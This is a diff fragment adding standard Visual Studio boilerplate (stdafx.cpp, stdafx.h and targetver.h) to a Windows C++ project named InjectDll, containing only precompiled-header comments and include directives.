|||
// stdafx.cpp : source file that includes just the standard includes
|
||||
// InjectDll.pch will be the pre-compiled header
|
||||
// stdafx.obj will contain the pre-compiled type information
|
||||
|
||||
#include "stdafx.h"
|
||||
|
||||
// TODO: reference any additional headers you need in STDAFX.H
|
||||
// and not in this file
|
|
@ -0,0 +1,12 @@
|
|||
// stdafx.h : include file for standard system include files,
|
||||
// or project specific include files that are used frequently, but
|
||||
// are changed infrequently
|
||||
//
|
||||
|
||||
#pragma once
|
||||
|
||||
#include "targetver.h"
|
||||
|
||||
#include <stdio.h>
|
||||
#include <tchar.h>
|
||||
#include <Windows.h>
|
|
@ -0,0 +1,8 @@
|
|||
#pragma once
|
||||
|
||||
// Including SDKDDKVer.h defines the highest available Windows platform.
|
||||
|
||||
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
|
||||
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
|
||||
|
||||
#include <SDKDDKVer.h>
|